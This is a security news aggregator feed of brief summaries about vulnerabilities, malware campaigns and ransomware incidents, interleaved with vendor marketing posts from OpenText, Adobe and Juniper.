A vulnerability in the Out-of-Band Access Point (AP) Image Download, the Clean Air Spectral Recording, and the client debug bundles features of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system. This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an affected system.  An attacker could exploit this vulnerability by sending crafted HTTPS requests to the AP file upload interface. A successful exploit could allow the attacker to upload files, perform path traversal, and execute arbitrary commands with root privileges.  Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Critical CVE: CVE-2025-20188

In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity.

A Russia-linked threat actor targeted a critical infrastructure organization in Ukraine with a new destructive malware dubbed PathWiper. Russia-linked threat actor targeted Ukraine’s critical infrastructure with a new wiper named PathWiper. Cisco Talos researchers reported that attackers utilized a legitimate endpoint administration tool, indicating they had access to the administrative console, then used it to […]

Popular Chrome extensions exposed user data by sending it over unencrypted HTTP, raising privacy concerns. Symantec urges caution for users.

The DPRK has long been tracked as a cyber actor that uses worker schemes to steal funds for its missile program and other regime goals.

Agentic AI technology will be integrated into the recently launched F5 Application Delivery and Security Platform.

The post Defending the Enterprise in the Age of Deception appeared first on Graylog.

Police seize major dark market, APT targets Kurdish and Iraqi government officials, and actors abuse AI to compromise software supply chains.

Microsoft has released a PowerShell script to help restore an empty 'inetpub' folder created by the April 2025 Windows security updates if deleted. As Microsoft previously warned, this folder helps mitigate a high-severity Windows Process Activation privilege escalation vulnerability.

The IRS is reportedly ending the Direct File, but a report obtained via the Freedom of Information Act says that 94% of users rated their experience as “excellent” or “above average.”

Though the operation was partially disrupted earlier this year, the botnet remains active and continues to target connected Android devices.

U.S. tax resolution firm Optima Tax Relief suffered a Chaos ransomware attack, with the threat actors now leaking data stolen from the company.

Town of Kittery, Maine falls victim to INC RANSOM Ransomware

A newly identified information-stealing malware, crafted in the Rust programming language, has emerged as a significant threat to users of Chromium-based browsers such as Google Chrome, Microsoft Edge, and others. Dubbed “RustStealer” by cybersecurity researchers, this sophisticated malware is designed to extract sensitive data, including login credentials, cookies, and browsing history, from infected systems. Emerging […] The post New Rust-Developed InfoStealer Drains Sensitive Data from Chromium-Based Browsers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Wireshark Filters

A sophisticated social engineering technique known as ClickFix baiting has gained traction among cybercriminals, ranging from individual hackers to state-sponsored Advanced Persistent Threat (APT) groups like Russia-linked APT28 and Iran-affiliated MuddyWater. This method targets human end users as the weakest link in cybersecurity defenses, tricking them into executing malicious commands through seemingly benign prompts. A […] The post Hackers Leverage New ClickFix Tactic to Exploit Human Error with Deceptive Prompts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Cybersecurity researchers are alerting to a new malware campaign that employs the ClickFix social engineering tactic to trick users into downloading an information stealer malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems. The campaign, according to CloudSEK, has been found to leverage typosquat domains mimicking U.S.-based telecom provider Spectrum. "macOS users are served a...

Fax remains an essential part of healthcare communications, owing to its security, traceability and HIPAA-compliance. Seven in U.S. 10 hospitals still rely on fax to exchange health information, according to the Office of the National Coordinator (ONC) for Healthcare Information Technology.   Fax has evolved dramatically, from outdated analog systems with paper and physical machines to modern cloud-based solutions. Despite all the technological advancements and adoption of electronic healthcare records, many healthcare organizations are still relying on aging fax systems with complex on-premises infrastructure which leads to inefficiencies, security risks and limited interoperability. Here are five signs that your organization’s fax solution needs modernization:  1. High failure rates  Does your fax system performance leave something to be desired? High fax failure rates in healthcare can delay the transmission of critical information like referrals, lab results, and treatment plans, leading to postponed diagnoses, disrupted care coordination, and ultimately poorer patient outcomes. At the same time, these failures create costly inefficiencies for providers, as staff must spend valuable time troubleshooting, resending, and verifying faxes, which increases labor costs and reduces productivity. Delays can also impact billing cycles, slow down reimbursements, and damage patient satisfaction hurting both clinical performance and the organization's financial health. 2. Security vulnerabilities, compliance risks   Aging fax systems pose significant security and compliance risks because they rely heavily on manual processes, making them prone to human errors like misdirected faxes and unattended documents, key contributors to many data breaches. These systems typically lack modern safeguards such as encryption, access controls, and audit trails, leaving sensitive patient data vulnerable to interception or unauthorized access. As a result, any breach intentional or accidental can lead to serious regulatory consequences and financial losses, contributing to the rising average cost of data breaches in healthcare. Research shows that over 85% of all data breaches involved a human element. The average cost of a data breach jumped to $4.88 million in 2024, according to analysis of data compiled by the Ponemon Institute. That’s up 10% from the year prior.  3. Hidden costs of legacy systems   Healthcare organizations often drain valuable IT resources maintaining aging, on-premises fax and telephony systems, or rely on third-party providers with unreliable networks. These outdated technologies not only demand constant upkeep but also cause frequent transmission errors and communication breakdowns. As a result, front-line staff are burdened with correcting issues instead of focusing on patient care, leading to operational inefficiencies, delayed treatment, and ultimately a diminished patient experience. 4. Integration challenges with modern EHR systems   Interoperability continues to be a challenge in U.S. healthcare settings with hundreds of different electronic health record (EHR) systems in use at different hospitals and clinics, often tailored to specific needs. With nearly 90% of U.S. based physicians using an EHR, ensuring related systems are integrated is essential. Integrating digital fax systems with modern EHRs ensures seamless and timely care coordination.   5. Information bottlenecks and the impact on clinical staff and patient experience   Legacy fax systems often create delays as faxes wait in queues for manual processing. Removing these bottlenecks with integrated AI enabled capture solutions can help speed workflows while reducing processing delays and human error.   Digital fax success stories in healthcare  Fax reliability and care coordination are directly connected. The University of Kansas Health System was dealing with a rise in fax transmission errors while local telcos reduced support for analog fax solutions. Employees spent significant amounts of time resending faxes and 90% of IT time was spent troubleshooting fax issues. By working with OpenText, they were able to implement a hybrid, HIPAA compliant digital fax solution that boosted fax transmission success to nearly 100%.   The Baptist Hospitals of Southeast Texas reduced the risk of delays to front-line patient services by improving the availability of fax services. The healthcare provider also avoided rising costs for fax lines as telcos phase out analog services. They boosted clinical efficiency by 20% while unlocking $200,000 in annual cost savings with a HIPAA-compliant fax solution from OpenText.  Building a business case for digital fax  1. Start with why: connect to patient care  When building your case, anchor the conversation in patient outcomes and clinician efficiency. Analog fax systems often lead to delays, missed referrals, and security gaps—none of which are acceptable in a patient-centered environment.  Tip: Use real stories. Did a critical patient referral get delayed because a fax line was busy? Share that. It brings urgency to the conversation.  2. Quantify the hidden costs of analog fax  It’s easy to overlook how expensive traditional faxing really is. Tally up the costs of:  Analog phone lines – monthly charges for each line used exclusively for faxing.  Third-party telephony services – fees paid to external vendors that may lack reliability or SLAs.  Hardware maintenance – costs for servicing or replacing fax machines, plus depreciation over time.  Consumables - paper, toner, and fax machine maintenance.  Staff labor costs - time spent manually sending, receiving, filing, and routing faxes.  Error correction and rework - time and resources spent on resolving failed transmissions or mis-faxes. Transmission failures and downtime - impact of fax delays on clinical workflows, patient care, and revenue cycles. Storage and archiving costs - physical space or systems needed to store paper records or scanned documents. Opportunity costs - value of time and resources that could be re-directed to higher value patient care or innovation if fax related burdens were reduced. Tip: Benchmark your current costs against digital fax solutions.   3. Highlight the compliance and security risks  Healthcare is one of the most regulated industries—and analog faxing creates gaps:  No audit trails for those who sent or received a fax  Risk of PHI left in trays or misdialed numbers  Lack of access controls  Digital fax offers encryption, audit logs, and user-level access management that help you stay on the right side of HIPAA, HITECH, and other regulations.  Tip: Talk to your compliance team early. Their support can strengthen your case dramatically.  4. Align with strategic goals  Most healthcare organizations have digital transformation initiatives underway. Show how digital fax aligns with broader goals:  Supporting remote and hybrid work  Reducing paper-based processes  Improving interoperability with EHRs and other systems  Tip: Reframe digital fax as an enabler of strategic priorities, not just a utility replacement.  5. Propose a phased approach  Large IT projects can feel daunting. Ease leadership concerns by recommending a phased rollout:  Start with a pilot in a department with high fax volume (e.g., referrals, radiology, or medical records)  Measure success, then expand  Tip: Choose a modern, cloud-native fax solution that eliminates the need for legacy infrastructure and supports rapid scalability across departments without the complexity of maintaining analog systems. 6. Estimate ROI and payback period  Executives want numbers. Estimate how long it will take to recoup the investment based on reduced costs and improved productivity. Most healthcare organizations see ROI within 6–12 months.  Tip: Include both hard savings (e.g., eliminated phone lines) and soft savings (e.g., time saved per fax, reduced risk of fines).  Digital transformation in healthcare isn’t just about big-ticket technologies. Sometimes, the biggest gains come from modernizing the tools we rely on every day. Fax is still essential—but it doesn’t have to be analog or on-premises. Build your case thoughtfully, and you’ll not only win leadership support—you’ll give your teams a faster, safer, and smarter way to connect with HIPAA-compliant fax.  The post 5 signs your healthcare fax solution needs an upgrade appeared first on OpenText Blogs.

Sophos X-Ops researchers have identified over 140 GitHub repositories laced with malicious backdoors, orchestrated by a single threat actor associated with the email address ischhfd83[at]rambler[.]ru. Initially sparked by a customer inquiry into the Sakura RAT, a supposed open-source malware touted for its “sophisticated anti-detection capabilities,” the investigation revealed a much broader and more insidious campaign. […] The post Hundreds of Malicious GitHub Repos Targeting Novice Cybercriminals Traced to Single User appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Security Advisory Description In the Linux kernel, the following vulnerability has been resolved: mm: call the security_mmap_file() LSM hook in remap_file_pages() The remap_file_pages syscall ...

Destructive malware has been a hallmark of Putin's multi-modal war A new strain of wiper malware targeting Ukrainian infrastructure is being linked to pro-Russian hackers, in the latest sign of Moscow's evolving cyber tactics.

Have you tried the new coding agent in GitHub Copilot? Here’s how developers are using it to work more efficiently. The post Assigning and completing issues with coding agent in GitHub Copilot appeared first on The GitHub Blog.

An observed voice phishing campaign is impersonating IT support workers.

Comments submitted by OpenAI leadership to a House group dedicated to AI and energy reiterated the need for broad infrastructure investments.

The networking giant has urged enterprises to update immediately

A newly identified social engineering attack dubbed “ClickFix” has emerged as a significant threat, leveraging meticulously crafted fake Cloudflare verification pages to trick users into executing malicious code on their devices. This phishing tactic, disguised as a routine security check, exploits the familiarity of Cloudflare’s Turnstile CAPTCHA interface to deceive users into running hidden PowerShell […] The post ClickFix Attack Uses Fake Cloudflare Verification to Silently Deploy Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Healthcare giant Kettering Health, which manages 14 medical centers in Ohio, confirmed that the Interlock ransomware group breached its network and stole data in a May cyberattack.

You’ve heard the argument: We needed the sales presentation immediately and marketing couldn’t turn it around quick enough, so we pulled a few images from the web, generated some AI copy and put our logo on it. Repeat this same scenario but replace the marketer with the HR teammate who needed a training guide or the regional event manager who developed materials on the fly for a show. All good-intentioned, but did the unauthorized tools the employees used create security vulnerabilities, licensing compliance issues, and branding violations? Across departments like marketing, HR/communications, and sales, there’s a rising demand for personalized, on-brand content. Both internal and remote teams need compelling, scalable assets to keep pace with a fast-moving business environment and capture the attention of increasingly distracted audiences. The good news is AI technology has made professional-grade creative tools more accessible and has significantly lowered the cost of content production. The opportunity exists for you to equip your business users with access to tools to build their own content while staying in compliance with brand and IT infrastructure policies. With Adobe Express, you can drive digital transformation by enabling secure, scalable technology adoption across the organization. Accelerate content creation with AI-powered tools The opportunity for marketing, in partnership with IT, is to enable business teams to create brand-compliant content independently through governed systems and processes. A starting point in this transformation is identifying the different business user needs and determining what tools are needed. Your marketing team is responsible for creating compelling, on-brand deliverables for your company. They also have a responsibility for maintaining brand compliance to ensure your company is represented with quality and consistency across all surfaces. As power users, they need the professional level apps found in Adobe Creative Cloud Pro which includes apps like Photoshop, InDesign, Illustrator, Premiere Pro and Adobe Express. For example, the latest AI features built into the Creative Cloud apps help marketing teams accelerate time-to-market while maintaining brand quality and consistency. The AI-powered workflows and content reuse also help marketers reduce production costs. Other teams can also gain benefits from these tools. Sales, human resources, training, and other staff need to quickly create content that can be personalized to their audiences. They typically face challenges with slow turnaround time to receive collateral from marketing, a lack of skills to use professional creative tools, and having to divert their time from day-to-day responsibilities to take on content production. That’s why they need easy tools – that require limited training – to help them quickly create content and re-purpose existing content with customized messaging. Speed, security, scalability: Optimize with Adobe Adobe Express meets the rising demand for content that adheres to IT and marketing policies. The solution enables marketers to create pre-approved templates with built-in guardrails such as locked elements and style controls. For example, Brand Kits lets your marketing team implement a scalable content approach that also protects your brand. Implementing Adobe Express across the organization optimizes your tech infrastructure while maintaining security and reliability. Creation of these approved materials gives your organization instant access to approved templates and assets in a brand-customized home experience. Adobe Express lets even a novice creator develop all types of materials – social media posts, presentations, printable content – with drag-and-drop ease using the all-in-one editor feature. For example, Quick Actions enables users to make quick enhancements to photos, videos, and PDFs. Also, the solution provides access to millions of high-quality Adobe Stock images, fonts, and videos, which protects users – and your organization – from the security risks of importing unknown materials from the web. The solution is also a cost saver. For example, unused and pro licenses are a costly investment for individuals with light usage needs. Providing Adobe Express licenses to sales, human resources, and others that are creating content is a cost-effective way to reduce operational expenses while implementing commercially safe AI content tools. The demand for new content will continue to grow. Create the foundation for your team to create content at scale – and retain IT governance. Explore the options to implement Adobe Express across your organization or teams today.

DragonForce, a ransomware group first identified in fall 2023, has claimed over 120 victims in the past year, marking its rapid ascent as a formidable player in the ransomware ecosystem. Initially operating under a Ransomware-as-a-Service (RaaS) model, DragonForce has since pivoted to a ransomware cartel structure, as announced in March 2025 on its data leak […] The post DragonForce Ransomware Reportedly Compromised Over 120 Victims in the Past Year appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Official Juniper Networks Blogs Self-Driving Network™로 가는 여정 2단계: 인사이트 이전 게시물에서는 셀프 드라이빙 네트워크(Self-Driving Network™) 여정의 1단계인 지능형 네트워크의 핵심 기반인 데이터에 대해 살펴보았습니다. 하지만 데이터만으로는 문제를 해결할 수 없습니다. 2단계는 수학과 데이터 사이언스를 적용하여 데이터에서 실제 가치를 추출하는 단계로, 원시 정보를 The post Self-Driving Network™로 가는 여정 2단계: 인사이트 appeared first on Official Juniper Networks Blogs.

Alleged data breach of Ministry of Health of Peru

The group was arrested in December as part of a raid that included 599 Nigerians and 193 other foreign nationals, many of them Chinese, on suspicion of being involved in a range of online crimes.

The group was arrested in December as part of a raid that included 599 Nigerians and 193 other foreign nationals, many of them Chinese, on suspicion of being involved in a range of online crimes.

Malicious actors are using deepfakes and voice-cloning technology to target senior executives in both the workplace and personal spaces.

Malicious actors are using deepfakes and voice-cloning technology to target senior executives in both the workplace and personal spaces.

As small businesses increasingly adopt artificial intelligence (AI) tools to streamline operations, cybercriminals are seizing the opportunity to deploy ransomware through deceptive campaigns. According to a recent report by Cisco Talos, attackers are masquerading as legitimate AI software providers, embedding malware within counterfeit applications that mimic popular services. With 98% of small businesses using at […] The post Beware: Fake AI Business Tools Spreading Hidden Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Official Juniper Networks Blogs Self-Driving Network™への移行の第2段階：インサイト  前回の投稿記事では、Self-Driving Network™への移行の第1段階、すなわち、データについて説明しました。データはインテリジェントなネットワークに欠かせない基盤です。しかし、データだけでは問題は解決しません。第2段階では、数理学とデータサイエンスを適用してデータから真の価値を取り出します。すなわち、未加工の情報から、ネットワークの管理方法を変える精度の高い実用的なインサイトへと変換します。       インサイトの価値  従来のトラブルシューティングでは、暗号のようなCLIコマンド、ログファイル、手作業で操作するチェック用デバイスなどを用いて調査を行います。これは事後対応で行うプロセスであり、時間もかかりフラストレーションもたまります。IT運用チームは遅れを取り戻そうと躍起になりますが、問題が解決されるのは、ユーザーが問題を報告した後に限られます。1つの問題点を探し出すのは、干し草の中から1本の針を見つけるようなものです。考えられる原因は無数にあるからです。   AIネイティブのインサイトを利用すれば、こうした当て推量の作業をする必要がなくなります。IT運用チームは、ログやコマンドライン出力を基に探し回る代わりに、ユーザーが気づく前に問題を検知して解決できます。適切なデータインサイトが事前に問題を明らかにするため、「火消し作業」に追われるフラストレーションや絶え間なく続くトラブルシューティング作業から解放されます。   実際のインパクト  AIおよびAIが提供するインサイトに対する信用と信頼を得るためには、IT運用チームがその目で見て信じる必要があるかもしれません。私のお気に入りの事例は、ある懐疑的なITマネージャーとPoC（概念実証）で一緒に作業したときのことです。そのITマネージャーは、Juniper Mist AI™が本当にネットワーク管理の役に立つのか、自分たちが気づかなかった問題を検出できるのかと疑っていました。PoCの間、デバイスを接続できたのは、ジュニパーのネットワークではなく他社のネットワークでした。幸いなことに、データインサイトによって、Mist以外のルーターにMTU（最大送信単位）の設定ミスがあり、認証パケットの通過を妨げていたことを当社は発見できました。    別のケースでは、Mist AIがある従業員のデスクにあるイーサネットケーブルの障害を検知しました。この問題は誰も報告していませんでした。当初、IT運用チームはこのアラートを真剣に受け止めませんでした。しかし、IT運用チームがその従業員に確認を取ると、その従業員は有線ネットワークが信頼できないという理由で、ひそかにWi-Fiに切り替えていたことが判明しました。Mist AIは、IT運用チームが発見できなかった問題を表面化しました。    最初は懐疑的だったITマネージャーは、Mist AIがこうした問題や他の問題を正確に特定するのを見て、信頼を置くようになりました。   このような細かい可視化によって、さまざまな業界でIT運用の変革が進んでいます。Gap Inc.などの小売企業は現在では、ネットワーク正常性に対して詳細なインサイトを得るようにしており、これによって障害対応チケットを最大90%削減できています。「今では、データを細分化して、特定の店舗で問題が発生していることを明確に把握することができます」と、Gap Inc.のグローバルネットワークアーキテクトであるスネハル・パテル氏は述べています。店舗レベルでインサイトを得ることで、IT運用チームは迅速に対応することが可能になり、従業員とお客様にシームレスな接続を提供できるようになっています。   高等教育機関も多大なメリットを見出しています。ダートマス大学では、Mist AIによってキャンパスのすべてのユーザーが優れたエクスペリエンスを享受できるようになりました。「問題に遭遇しているユーザーが全体のわずか2%であっても、その問題を即座に解決できます」と、ダートマス大学のCIO、ミッチ・デイビス氏は述べています。AIネイティブのインサイトを活用することで、IT運用チームは広範囲にわたる苦情が寄せられるのを待っている必要はなくなりました。事前対応で問題を特定して対応できるため、学生やスタッフに一貫した高品質のエクスペリエンスを提供できます。   Mist AIのインサイトは、可視化のみならず、組織にとってますます大きな課題になりつつあるITスキルギャップの解消にも役立ちます。例えば、Rady小児病院では、AIによってネットワーク管理の敷居を低くする取り組みを続けています。「経験豊富なエンジニアに、関係性の薄いメトリックを集めて解釈してもらう必要がなくなりました。今では、AからBまで問題を直接見通すことができるようになりました」と、Rady小児病院のネットワークエンジニアチームのリーダー、ダニエル・マディン氏は述べています。こうした転換によって、スキルの高いエンジニアはイノベーションや戦略的なプロジェクトに集中できるようになり、まだ経験の少ないスタッフは日常的な運用を自信をもって管理できるようになりました。IT運用チームに大きく負荷がかかっていた頃であれば、この能力は特に貴重です。   移行の続き  インサイトの獲得によって状況は一変し、IT運用チームはこれまで以上に迅速かつ効率的に問題を解決できるようになります。しかし、次の段階に進み、インサイトを推奨事項に変換すると、さらに大きな可能性が開けます。次回の投稿では、AIネイティブの推奨事項がどのようにして事前対応のネットワーク管理を実現し、真のSelf-Driving Networkへ私たちを近づけていくのかについて説明します。   お客様の組織は、Self-Driving Networkへの移行プロセスのどの段階にありますか？ どの段階にあっても、ジュニパーは、お客様の次のステップをサポートします。     このブログシリーズの次の投稿をぜひお読みください。  このシリーズのその他のブログ  The post Self-Driving Network™への移行の第2段階：インサイト  appeared first on Official Juniper Networks Blogs.

A new data wiper malware named 'PathWiper' is being used in targeted attacks against critical infrastructure in Ukraine, aimed at disrupting operations in the country.

Official Juniper Networks Blogs Fase 2- In viaggio verso il Self-Driving Network™: insight  Nel nostro precedente post, abbiamo esplorato la prima tappa del viaggio verso il Self-Driving Network™: i dati, la base fondamentale per creare reti intelligenti. Ma i dati da soli non The post Fase 2- In viaggio verso il Self-Driving Network™: insight  appeared first on Official Juniper Networks Blogs.

State-backed threat actors from a handful of countries are using ChatGPT for a range of malicious purposes, including malware refinement, employment scams and social media disinformation campaigns.

State-backed threat actors from a handful of countries are using ChatGPT for a range of malicious purposes, including malware refinement, employment scams and social media disinformation campaigns.

State-backed threat actors from a handful of countries are using ChatGPT for a range of malicious purposes, including malware refinement, employment scams and social media disinformation campaigns.

Official Juniper Networks Blogs Fase 2 van de reis naar het zelfsturende netwerk: inzichten In het vorige bericht gingen we in op de eerste fase van de weg naar het zelfsturende netwerk: data – de cruciale basis voor een intelligent netwerk. Maar met alleen The post Fase 2 van de reis naar het zelfsturende netwerk: inzichten appeared first on Official Juniper Networks Blogs.

Noteworthy stories that might have slipped under the radar: FBI issues an alert on BadBox 2 botnet, NSO disputing the $168 million WhatsApp fine, 1,000 people left CISA since Trump took office. The post In Other News: FBI Warns of BadBox 2, NSO Disputes WhatsApp Fine, 1,000 Leave CISA appeared first on SecurityWeek.

Official Juniper Networks Blogs Estágio 2 da jornada para a Self-Driving Network™: insights  Em nosso post anterior, investigamos o primeiro estágio da nossa jornada para a Self-Driving Network™ : os dados, a base fundamental para as redes inteligentes. Mas sozinhos os dados não resolvem problemas. O estágio The post Estágio 2 da jornada para a Self-Driving Network™: insights  appeared first on Official Juniper Networks Blogs.

Official Juniper Networks Blogs Segunda etapa del camino a la red autónoma: información valiosa En nuestra publicación anterior, analizamos la primera etapa del camino a la Self-Driving Network™: los datos. Si bien los datos constituyen los pilares fundamentales de las redes inteligentes, por sí solos, no sirven The post Segunda etapa del camino a la red autónoma: información valiosa appeared first on Official Juniper Networks Blogs.

A newly identified wave of cyberattacks by the notorious Scattered Spider hacking group has zeroed in on help-desk administrators at major technology companies, leveraging advanced social engineering techniques to breach corporate defenses. Known for their adept use of psychological manipulation, these threat actors have demonstrated a chilling ability to exploit human vulnerabilities as effectively as […] The post Scattered Spider Hackers Target Tech Company Help-Desk Administrators appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Security Advisory Description In PyYAML before 5.1, the yaml.load() API could execute arbitrary code if used with untrusted data. The load() function has been deprecated in version 5.1 and the ' ...

TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.

TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.

TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.

Synthetic data offers organizations a way to develop AI while maintaining privacy compliance but requires careful management to prevent re-identification risks and ensure model accuracy.

The ransomware group combines IT vendor impersonation and phishing frameworks like Evilginx to breach its targets

How to keep your data safe before activating tools like Copilot

Customers trust OpenText™ Documentum™ Content Management (CM) to help them ensure their high volume, critical business content is secure, organized, preserved and easily accessible while adhering to privacy and security protocols. Documentum users are also extending the value of their content to the cloud, simplifying access for content creation and collaboration, driving productivity improvements with easy-to-understand and personalized user experiences, all while applying Documentum’s robust governance at every stage of the content lifecycle. June 2025: What's new in OpenText Documentum CE 25.2 The release of OpenText™ Documentum™ Content Management (CM) CE 25.2 is a game-changer, introducing a robust set of features to elevate productivity, strengthen security, and simplify workflows. This update focuses on five critical areas: enhanced user experience, modernization and migration, powerful business application integrations, improved governance, and AI-driven workflow insights. Let’s explore how these updates can transform your content ecosystem.  A next-gen user experience that boosts efficiency  CE 25.2 redefines user interaction with a sleek, intuitive interface designed for ease of use. The new rich text editor simplifies content creation, while features like the recycle bin prevent accidental data loss. Workflow visual indicators provide instant clarity on document status, and enhanced viewing capabilities support multiple rendition formats, ensuring seamless access to content. These updates cut down on training time and empower users to work more efficiently, making daily tasks feel effortless.  Modernization and migration made seamless Upgrading to CE 25.2 is now a breeze, thanks to smarter migration tools. Search migration efficiencies slash downtime, and optimized HELM charts reduce manual errors during deployment. With certification for Java 21 and Microsoft Azure HSM encryption, the platform ensures secure operations and compliance, especially for regulated industries. These enhancements make transitions smoother, letting organizations modernize without the usual headaches.  Powerful integrations for enhanced collaboration Collaboration gets a major boost with CE 25.2’s seamless integrations. The improved Microsoft® 365 Teams integration enables co-authoring of OpenText Documentum CM content directly within Teams, fostering real-time teamwork. Additionally, CMIS API extensions allow effortless connectivity with systems like SAP® S/4HANA, creating a unified content ecosystem. These integrations break down silos, ensuring your teams can work together efficiently across platforms.  Stronger governance to safeguard your data Security and compliance remain top priorities in CE 25.2. Integration with Microsoft Purview, introduced last release, now supports sensitivity labels with user-defined permissions, and protected mail search, giving you tighter control over sensitive data. These governance features help organizations meet stringent regulatory requirements while protecting critical information, ensuring peace of mind in an increasingly complex digital landscape. Available only with containerized OpenText Documentum CM deployments. AI-driven workflow insights for smarter decisions  The introduction of AI-driven workflow insights sets CE 25.2 apart. With OpenText Content Aviator, users gain access to intelligent summaries and risk flagging at every workflow stage, enabling faster, data-driven decisions. AI-drafted reports further streamline processes by reducing manual effort, allowing teams to focus on high-value tasks. This intelligent automation enhances productivity and positions organizations to stay ahead of the curve.  Conclusion: A smarter, more efficient content ecosystem OpenText Documentum Content Management CE 25.2 isn’t just an update—it’s a transformative leap forward. By prioritizing user experience, seamless modernization, robust integrations, stringent governance, and AI-powered insights, this release equips organizations to manage content more effectively, securely, and intelligently. Whether you’re looking to boost collaboration, ensure compliance, or leverage AI for smarter workflows, CE 25.2 delivers the tools you need to thrive in today’s fast-paced digital world. Ready to streamline your content ecosystem? This is the upgrade you’ve been waiting for.  December 2024: What's new in OpenText Documentum CE 24.4 OpenText Documentum Content Management (CM) CE 24.4 introduces significant enhancements designed to extend the value of your current system by delivering the right functionality to the right users at just the right moment.  The main improvements in this release are listed below: Delight users with instant access to content using biometric authentication It does not matter if your users favor an Android or Apple smartphone, they are used to having access instant access using biometrics.  Why should it be any different when they need to access content on-the-go?  Now users can enable login via biometrics using the OpenText Documentum CM Mobile app settings. Biometric authentication provides the following benefits: Enhanced security - Biometric authentication uses unique traits (e.g., fingerprints, facial recognition, voice) to enhance security over traditional passwords. Convenience - Users no longer need to remember or manage complex passwords, as biometric methods allow quick and effortless access with a simple scan or gesture. Personalized experience - Ties access directly to an individual, ensuring a seamless and tailored user experience without the need for additional verification steps. Versatility across devices – Support for Apple smartphones and Android smartphones offers a consistent and familiar method across multiple platforms. Give users an intelligent assistant right at their fingertips OpenText Content Aviator can now be used to expand the value of your business content and lighten your users’ daily workload in the cloud and off-cloud.  Gone are the days of manually summarizing content, creating detailed bullet lists, tabulating lists, identifying risks or creating draft plans based on content stored in various folders.  The intelligent assistant puts chat-based conversational search right at your employees' fingertips. With the added ability to run OpenText Documentum CM with OpenText Content Aviator off-cloud, organizations can realize the following benefits: Data privacy and security - Keeping GenAI operations on-premises/off-cloud ensures sensitive data remains completely within the organization’s control. Offline functionality - On-premises AI systems can operate without internet connectivity, ensuring uninterrupted access in environments with unreliable networks, such as remote facilities or during outages. Compliance with industry standards - For industries like finance, healthcare, or government, where regulatory requirements mandate data residency or restrict third-party access, on-premises AI ensures adherence to these rules. Seamless, consistent protection across both Microsoft® and OpenText Documentum CM environments The new integration with Microsoft Purview Sensitivity Labels provides an extra layer of information governance, compliance, and security while maintaining seamless collaboration. This will help organizations: Streamline document classification – Ensure documents stored in the repository are classified based on organizational policies. This can be completed manually by users or automatically based on metadata, content, or predefined rules. Safeguard sensitive content – Protect sensitive content even when downloaded or shared outside OpenText Documentum CM. Comprehensive document tracking with Microsoft Purview – Provide detailed tracking of how documents are accessed, modified, or shared within and outside OpenText Documentum CM using Microsoft Purview’s audit capabilities. Secure collaboration with Microsoft Teams, SharePoint and OneDrive - Enable secure integration with Microsoft Teams, SharePoint, and OneDrive, allowing users to access and collaborate on OpenText Documentum CM-stored files while maintaining security controls. Unified security with Purview Sensitivity Labels - Extend Purview Sensitivity Labels to ensure consistent classification and security policies across all repositories using OpenText Documentum CM in a hybrid environment (on-premises + cloud). Personalized efficiency for effortless content access The new OpenText Documentum Smart View features help organizations tailor content effortlessly by providing a more personalized user experience, improved workflow efficiency, and streamlined document management. The following are some of the new features in this release:   Various menu improvements (Versions, Renditions, Location, Workflow, and Relations) Enhances user experience with more intuitive navigation. Increases efficiency by reducing time spent searching for options. Improves accessibility to key document-related actions. View workflows on a per document basis Provides better visibility into document-specific workflows. Enables faster decision-making with clear workflow tracking. Reduces errors by ensuring the correct workflow is followed. Improvements to iURLs for direct file viewing Provides updates to relationship management when creating or importing documents. Aids in updating landing page changes. Filtering improvements Doclist (Show or hide folders) - Allows users to customize their view for a more focused workspace and reduces clutter by hiding unnecessary folders. Business filters for tasks on workflow overview widget - Helps users quickly find relevant tasks and enhances productivity by streamlining task management. Caching improvements Cache last folder navigation - Saves time by remembering previous locations and reduces the need for repetitive navigation. Date improvements Users can set their on date formatting (Long, short, etc.)  - Provides flexibility based on user preferences and improves clarity in international teams with different date formats. Client can show local time zone while server maintains server time zone  - Prevents confusion from time zone differences and ensures accurate time tracking across global teams. Manual import of rendition to existing documents Streamlines the process of updating documents. Reduces errors by maintaining accurate document versions. Visual indicator when a markup exists in IV Enhances visibility of document changes or annotations. Improves collaboration by ensuring markups aren’t overlooked. Multi-binder ability in IV (Concatenation of selected documents in the viewer) Enables easier document comparison and review. Saves time by allowing multiple documents to be viewed as a single entity. Enhancing integration and real-time interaction using OpenText Documentum CM SDK’s external widgets The external widget in Smart View facilitates smooth integration with external clients, providing real-time updates and interactions with independent applications. It stays visible on-screen and updates dynamically as users engage with objects. This feature eases the shift from classic to Smart View by supporting the migration of custom dashboards, welcome pages, and app integrations. Using OpenAjaxHub allows customers to repurpose existing integrations for event subscription and publishing, ensuring seamless two-way communication between Smart View and almost any component. This will help organizations: Enhanced integration – Works with any JavaScript framework supporting OpenAjaxHub, an open standard. Real-time interactivity – Allows Smart View to send and receive events, enabling two-way communication. Improved user experience – Keeps widgets accessible and updated without requiring manual refreshes. Practical use case – Example implementation with Documentum Reports, where users can trigger client events externally via the “Show Report Templates” button. Leverage the new OpenText Documentum CM Search off-cloud The new OpenText Documentum CM Search offers rapid performance tied to compute power, improved search accuracy via a machine-learning engine supporting multiple languages and advanced search types (vector and semantic), a modern 